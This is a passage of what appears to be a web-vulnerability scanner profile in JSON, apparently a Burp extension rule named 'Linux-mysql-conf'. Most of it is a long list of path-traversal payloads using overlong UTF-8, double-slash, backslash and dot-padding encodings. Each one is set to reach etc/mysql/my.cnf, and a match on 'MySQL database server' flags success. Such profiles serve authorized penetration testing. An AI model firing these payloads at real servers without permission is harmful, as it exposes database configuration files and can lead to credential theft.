      "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
      "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
      "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
      "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
      "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
      "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
      "true,..%c0%2f{FILE}",
      "true,..%c0%2f..%c0%2f{FILE}",
      "true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
      "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
      "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
      "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
      "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
      "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
      "true,%c0%2e%c0%2e/{FILE}",
      "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
      "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
      "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
      "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
      "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
      "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
      "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
      "true,%c0%2e%c0%2e%c0%2f{FILE}",
      "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
      "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
      "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
      "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
      "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
      "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
      "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
      "true,..%c0%5c{FILE}",
      "true,..%c0%5c..%c0%5c{FILE}",
      "true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
      "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
      "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
      "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
      "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
      "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
      "true,%c0%2e%c0%2e\\{FILE}",
      "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
      "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
      "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
      "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
      "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
      "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
      "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
      "true,%c0%2e%c0%2e%c0%5c{FILE}",
      "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
      "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
      "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
      "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
      "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
      "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
      "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
      "true,///%2e%2e%2f{FILE}",
      "true,///%2e%2e%2f%2e%2e%2f{FILE}",
      "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,\\\\\\%2e%2e%5c{FILE}",
      "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
      "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,..//{FILE}",
      "true,..//..//{FILE}",
      "true,..//..//..//{FILE}",
      "true,..//..//..//..//{FILE}",
      "true,..//..//..//..//..//{FILE}",
      "true,..//..//..//..//..//..//{FILE}",
      "true,..//..//..//..//..//..//..//{FILE}",
      "true,..//..//..//..//..//..//..//..//{FILE}",
      "true,..///{FILE}",
      "true,..///..///{FILE}",
      "true,..///..///..///{FILE}",
      "true,..///..///..///..///{FILE}",
      "true,..///..///..///..///..///{FILE}",
      "true,..///..///..///..///..///..///{FILE}",
      "true,..///..///..///..///..///..///..///{FILE}",
      "true,..///..///..///..///..///..///..///..///{FILE}",
      "true,..\\\\{FILE}",
      "true,..\\\\..\\\\{FILE}",
      "true,..\\\\..\\\\..\\\\{FILE}",
      "true,..\\\\..\\\\..\\\\..\\\\{FILE}",
      "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
      "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
      "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
      "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
      "true,..\\\\\\{FILE}",
      "true,..\\\\\\..\\\\\\{FILE}",
      "true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
      "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
      "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
      "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
      "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
      "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
      "true,./\\/./{FILE}",
      "true,./\\/././\\/./{FILE}",
      "true,./\\/././\\/././\\/./{FILE}",
      "true,./\\/././\\/././\\/././\\/./{FILE}",
      "true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
      "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
      "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
      "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
      "true,.\\/\\.\\{FILE}",
      "true,.\\/\\.\\.\\/\\.\\{FILE}",
      "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
      "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
      "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
      "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
      "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
      "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
      "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
      "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
      "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
      "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
      "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
      "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
      "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
      "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
      "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
      "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
      "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
      "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
      "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
      "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
      "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
      "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
      "true,./../{FILE}",
      "true,./.././../{FILE}",
      "true,./.././.././../{FILE}",
      "true,./.././.././.././../{FILE}",
      "true,./.././.././.././.././../{FILE}",
      "true,./.././.././.././.././.././../{FILE}",
      "true,./.././.././.././.././.././.././../{FILE}",
      "true,./.././.././.././.././.././.././.././../{FILE}",
      "true,.\\..\\{FILE}",
      "true,.\\..\\.\\..\\{FILE}",
      "true,.\\..\\.\\..\\.\\..\\{FILE}",
      "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
      "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
      "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
      "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
      "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
      "true,.//..//{FILE}",
      "true,.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
      "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
      "true,.\\\\..\\\\{FILE}",
      "true,.\\\\..\\\\.\\\\..\\\\{FILE}",
      "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
      "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
      "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
      "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
      "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
      "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
      "true,../{FILE}",
      "true,../..//{FILE}",
      "true,../..//../{FILE}",
      "true,../..//../..//{FILE}",
      "true,../..//../..//../{FILE}",
      "true,../..//../..//../..//{FILE}",
      "true,../..//../..//../..//../{FILE}",
      "true,../..//../..//../..//../..//{FILE}",
      "true,..\\{FILE}",
      "true,..\\..\\\\{FILE}",
      "true,..\\..\\\\..\\{FILE}",
      "true,..\\..\\\\..\\..\\\\{FILE}",
      "true,..\\..\\\\..\\..\\\\..\\{FILE}",
      "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
      "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
      "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
      "true,..///{FILE}",
      "true,../..///{FILE}",
      "true,../..//..///{FILE}",
      "true,../..//../..///{FILE}",
      "true,../..//../..//..///{FILE}",
      "true,../..//../..//../..///{FILE}",
      "true,../..//../..//../..//..///{FILE}",
      "true,../..//../..//../..//../..///{FILE}",
      "true,..\\\\\\{FILE}",
      "true,..\\..\\\\\\{FILE}",
      "true,..\\..\\\\..\\\\\\{FILE}",
      "true,..\\..\\\\..\\..\\\\\\{FILE}",
      "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
      "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
      "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
      "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,MySQL database server"
    ],
    "Tags": [
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "Linux-mysql-conf",
    "IssueSeverity": "Medium",
    "IssueConfidence": "Certain",
    "IssueDetail": "Linux-mysql-conf: \u003cbr\u003e \u003cgrep\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [
      {
        "type": "Payload",
        "match": "{FILE}",
        "replace": "etc/mysql/my.cnf",
        "regex": "String"
      }
    ],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]